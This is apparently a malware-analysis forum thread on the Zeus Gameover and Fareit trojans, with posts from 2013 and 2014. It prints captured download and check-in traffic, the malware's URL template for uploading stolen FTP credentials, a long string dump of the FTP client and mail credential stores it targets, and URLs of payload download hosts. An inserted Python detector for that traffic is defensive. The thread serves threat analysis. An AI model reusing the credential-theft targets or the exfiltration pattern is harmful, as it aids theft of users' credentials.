A forum for reverse engineering, OS internals and malware analysis 

 #20343  by unixfreaxjp
 Fri Aug 02, 2013 10:50 am
This Zeus/Gameover was downloaded from the Fareit I reported HERE.
VT detection ratio is too low (3/46) https://www.virustotal.com/en/file/6335 ... 375438407/

The sample was downloaded from this remote host:
```http
GET /hc53.exe HTTP/1.1
Accept: */*
Accept-Language: ja
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: esmallboxes.com
Connection: Close
  :
HTTP/1.1 200 OK
Content-Length: 199168
Content-Type: application/octet-stream
Last-Modified: Thu, 01 Aug 2013 16:34:50 GMT
Accept-Ranges: bytes
ETag: "7a4646bd58ece1:428ef"
Server: Microsoft-IIS/6.0
X-Powered-By-Plesk: PleskWin
X-Powered-By: ASP.NET
Date: Fri, 02 Aug 2013 08:35:10 GMT
Connection: close
```
AutoStart path:
```
Software\Microsoft\Windows\CurrentVersion\Run
```
Poking the remote host over HTTP/1.1 with the User-Agent and headers below:
```
GET HTTP/1.1
Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
X-Real-IP: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
gzip
5629186B-0207-4659-AE5D-B09282932A86
```
Using the POST method to post the FTP credentials of the infected PC:
```
HTTP/1.1
Mozilla/5.0 (Windows; U; Windows NT 5.1)
index_get.php?key=YRHDXCF&action=ADD_FTP&id=%s&ftp_host=%s&ftp_login=%s&ftp_pass=%s
Transfer-Encoding: chunked
Content-Length:
Content-Encoding: gzip
```
These are the FTP credential stores targeted:
```
Software\VanDyke\SecureFX
Config Path
\Sessions
DataFolder
Software\FTPRush
RushSite.xml
Software\UltraFXP
Sites.xml
Estsoft\ALFTP\ESTdb2.dat
Software\Microsoft\Windows\CurrentVersion\Uninstall
FTP Commander
FTP Navigator
InstallLocation
UninstallString
%s\TurboFTP\addrbk.dat
%s:%s:%s:%s
%s:%s:%s:%s:%d
%s\SmartFTP\Client 2.0\Favorites
%s\*.xml
<Host>
<Host>
</Host>
<Port>
<Port>
</Port>
<User>
<User>
</User>
<Password>
<Password>
</Password>
%s:%s:%s:%s
%s:%s:%s:%s:%s
ixKZ-<
host
uid
pwd
software\ipswitch\ws_ftp
DataDir
%s\sites\ws_ftp.ini
connections
host
username
password
anonymous
e-mail
general
GHISLER
FtpIniName
Install_Dir
InstallDir
pstorec.dll
crypt32.dll
PStoreCreateInstance
CryptUnprotectData
FileZilla\FileZilla.xml
FileZilla\RecentServers.xml
FileZilla\SiteManager.xml
Server 
Site 
Install_Dir
FileZilla.xml
Last Server Pass
Last Server User
Last Server Host
\QCToolbar
QCHistory
\GlobalSCAPE
HostName
User
Password
software\far\plugins\ftp\hosts
software\far2\plugins\ftp\hosts
Username
Hostname
Password
User
Host
Software\FTPWare\CoreFTP\Sites
hdfzpysvpzimorhk
USER
HOST
PASS
E+ts
UID
URL
Encrypt_PW
User
Server
Password
Ftplist.txt
Password
HostName
Username
Software\CoffeeCup Software\Internet\Profiles
robert249fsd)af8.?sf2eaya;sd$%85034gsn%@#!afsgsjdg;iawe;otigkbarr
q9IN
%AppData%\..\Local\VirtualStore\Program Files\Total Commander
wcx_ftp.ini
Software\Ghisler
WininetCacheCredentials
DPAPI: 
internet explorer
MS IE FTP Passwords
Run in Secure Mode
%AppData%\..\Local\VirtualStore\Program Files\FileZilla
FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
Software\FileZilla
Software\FileZilla\Site Manager
User
Host
Pass
%s:%s:%s:%s
\*.ini
\Software\GlobalSCAPE\
```
Checked mail software:
```
Software\Microsoft\WAB\DLLPath
Microsoft Outlook
SOFTWARE\Clients\Mail
SOFTWARE\Clients\Mail\Microsoft Outlook
```
Opens WAB/Outlook Express to get IDs:
```
WABOpen
Identities
Microsoft\Outlook Express
*.dbx
MSWQ*.tmp
```
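Detection logic for the check-in and credential-upload traffic described in this post, written over a few raw HTTP requests; this is an added example, not part of the original post or of unixfreaxjp's analysis. The sample requests are constructed (the bot id, FTP host and server addresses are hypothetical); only the header shapes, the doubled `Mozilla/4.0` User-Agent, the client-sent `X-Real-IP` header and the `index_get.php?key=...&action=ADD_FTP` query come from the post.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample requests (hypothetical bot id, FTP host and C2 address);
# the header shapes come from the traffic shown in the post above.
SAMPLES = [
    "POST /index_get.php?key=YRHDXCF&action=ADD_FTP&id=BOT0001"
    "&ftp_host=ftp.example.test&ftp_login=u&ftp_pass=p HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1)\r\nHost: 192.0.2.10\r\n"
    "Transfer-Encoding: chunked\r\nContent-Encoding: gzip\r\n\r\n",
    "GET / HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; "
    "Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)\r\n"
    "X-Real-IP: 192.0.2.55\r\nHost: 192.0.2.10\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) "
    "Firefox/24.0\r\nHost: example.test\r\n\r\n",
]

def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP request into method, target and a lower-cased header map."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, target = lines[0].split(" ")[:2]
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers

def fareit_indicators(raw: str) -> List[str]:
    """Name the traits from the post that this single request exhibits."""
    method, target, h = parse_request(raw)
    hits: List[str] = []
    # Check-in UA repeats its product token: "Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; ...".
    if re.match(r"Mozilla/4\.0 \(Mozilla/4\.0;", h.get("user-agent", "")):
        hits.append("doubled-ua-token")
    # X-Real-IP is set by reverse proxies; a client sending it itself is odd.
    if "x-real-ip" in h:
        hits.append("client-sent-x-real-ip")
    # Credential upload: index_get.php?key=...&action=ADD_FTP&...&ftp_pass=...
    query = target.partition("?")[2]
    if "index_get.php" in target and "action=ADD_FTP" in query and "ftp_pass=" in query:
        hits.append("add-ftp-exfil")
    # The POST template declares a chunked, gzip-compressed body.
    if method == "POST" and h.get("transfer-encoding") == "chunked" and h.get("content-encoding") == "gzip":
        hits.append("chunked-gzip-post")
    return hits

def scan(requests: List[str]) -> Dict[int, List[str]]:
    """Map request index to its indicators, dropping requests with none."""
    return {i: hits for i, r in enumerate(requests) if (hits := fareit_indicators(r))}
```

Each indicator on its own is weak (a proxy can legitimately add X-Real-IP); the value is in the combination seen from a single host within a short window.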
 #21093  by R136a1
 Sun Oct 06, 2013 12:50 pm
http://www.secureworks.com/cyber-threat ... ownloader/
 #21972  by Xylitol
 Fri Jan 17, 2014 10:54 am
Fresh sample found yesterday, from an 18 KB file:
http://malwaredb.malekal.com/index.php? ... eaba2593b5
http://malwaredb.malekal.com/index.php? ... 3a62e64444
Downloading:
```
https://gwentpressurewashers.co.uk/images/stories/food/wav.exe
http://thisisyourwife.co.uk/images/banners/heap.exe
```
(The first one can be downloaded without SSL, but the file downloads it via SSL.)
https://www.virustotal.com/en/file/f063 ... 389956077/
https://www.virustotal.com/en/file/e33c ... 389956081/
https://www.virustotal.com/en/file/f080 ... 389956086/
https://www.virustotal.com/en/file/b0d9 ... 389956087/
 #22224  by Xylitol
 Sat Feb 15, 2014 2:38 pm
To summarise what happened these weeks:
Last clear sample before the '.enc' encryption appeared: 01-24 - http://vxvault.siri-urz.net/ViriList.ph ... 2A31F722AB
Now, this one: http://malwaredb.malekal.com/index.php? ... 9f558408e6
Detected as Upatre by Malwarebytes, the one from 27 Jan downloads the following:
```
http://at-tuqa.com/images/banners/pdf.enc (still active)
```
This one from the 24th: http://malwaredb.malekal.com/index.php? ... 01051d9416 (again Upatre)
24th: http://malwaredb.malekal.com/index.php? ... 5140ec72c6

So if we haven't missed a sample, the Zeus Gameover gang started using encryption on 24 January.
Gary Warner was the first person to talk (publicly) about the new encryption: http://garwarner.blogspot.fr/2014/02/ga ... on-to.html (02 Feb)
Thanks to siri for helping me retrace the date of first use.

Related articles about the encryption:
CrySyS Blog - GameOver Zeus now uses Encryption to bypass Perimeter Security – .enc encryption
Kahu Security - Exploring XOR Decryption Methods
siri - ZeuS GameOver decoder
---
Upatre:
First submission 2014-01-23: https://www.virustotal.com/en/file/e503 ... 392476566/
First submission 2014-01-24: https://www.virustotal.com/en/file/1317 ... 392476567/
First submission 2014-01-27: https://www.virustotal.com/en/file/97a5 ... 392476567/

Zeus Gameover 'last' clear sample:
First submission 2014-01-23: https://www.virustotal.com/en/file/e3b1 ... 392476682/

Zeus Gameover 'first' encoded sample (downloaded from Upatre: bc20cd3aaad285fa8820c901051d9416):
https://www.virustotal.com/en/file/2fc9 ... 392480407/
 #22248  by SomeUnusedName
 Tue Feb 18, 2014 9:21 am
Am I missing something, or is all the fuss basically about some downloader used for Zeus Gameover which now encrypts its payload? How's that anything special? It's not like other downloader bots don't do it.
 #22252  by forty-six
 Tue Feb 18, 2014 2:30 pm
Something missing from Xylitol's post: Upatre is not the only way GMO is being delivered, just one of the ways.

Caught it via Andromeda too.

Lately getting dropped via Angler EK.